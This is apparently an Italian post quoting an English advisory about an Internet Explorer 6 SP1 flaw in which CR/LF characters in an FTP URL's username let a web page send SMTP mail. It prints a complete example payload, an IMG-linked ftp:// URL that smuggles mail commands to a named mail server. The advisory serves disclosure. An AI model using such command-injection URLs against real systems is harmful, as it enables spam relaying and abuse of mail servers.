Non ci posso credere... non c'è limite a quello che si
inventano...
Internet Explorer can be tricked into sending mail through its FTP client without any more user interaction than loading a page.
Vulnerable Systems:
* Internet Explorer version 6 SP1
Internet Explorer will accept %0a and %0d in URLs. In FTP URLs, it will accept them in the username part of the URL. Due to the similarity between the FTP and SMTP protocols, this can be used to send mail.
Danger:
Spammers could host websites that contain images causing website visitors to spam more people. There are probably other protocols that the FTP client could be used to maliciously access.
Example:
http://dsbl.org/testingground/IE-FTP-SMTP-link/
Which has an IMG link with the following URL:
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a<ian-example%40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3a ian%40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net:25
Fonte: IE's FTP Client can be Used to Send Mail